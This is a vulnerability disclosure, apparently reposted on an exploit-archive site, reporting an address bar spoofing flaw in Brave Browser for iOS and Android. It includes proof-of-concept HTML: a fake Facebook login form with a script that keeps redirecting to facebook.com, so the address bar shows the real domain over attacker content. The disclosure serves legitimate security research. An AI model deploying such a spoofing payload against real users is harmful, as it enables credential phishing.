Brave Browser Address Bar Spoofing Vulnerability ( iOS + Android )

2017.01.09
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Hello, I am Aaditya Purani, I would like to Report Address Bar spoofing vulnerability in Brave Browser on the IOS as well as Android Platform. All the Test have been carried out against Latest Brave Browser whose versions i have mentioned in Products affected section. Summary: Brave Browser Suffers from Address Bar Spoofing Vulnerability. Address Bar spoofing is a critical vulnerability in which any attacker can spoof the address bar to a legit looking website but the content of the web-page remains different from the Address-Bar display of the site. In Simple words, the victim sees a familiar looking URL but the content is not from the same URL but the attacker controlled content. Some companies say "We recognize that the address bar is the only reliable security indicator in modern browsers" . Products affected: In IOS - Affected is the Latest Version 1.2.16 (16.09.30.10) In Android - Affected in Brave Latest version 1.9.56 Exploit Code: <html> <title>Address Bar spoofing Brave</title> <h1> This is Dummy Facebook </h1> <form> Email: <input type="text" name="username" placeholder="add email"><br> Password: <input type="text" name="password" placeholder="pass"> <script> function f() { location = "https://facebook.com" } setInterval("f()", 10); </script> </html> Credits: Aaditya Purani Contact : https://aadityapurani.com https://twitter.com/aaditya_purani Proof Of Concept: https://hackerone.com/reports/175958 With Kind Regards Aaditya Purani

References:

https://aadityapurani.com
https://twitter.com/aaditya_purani
https://hackerone.com/reports/175958


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top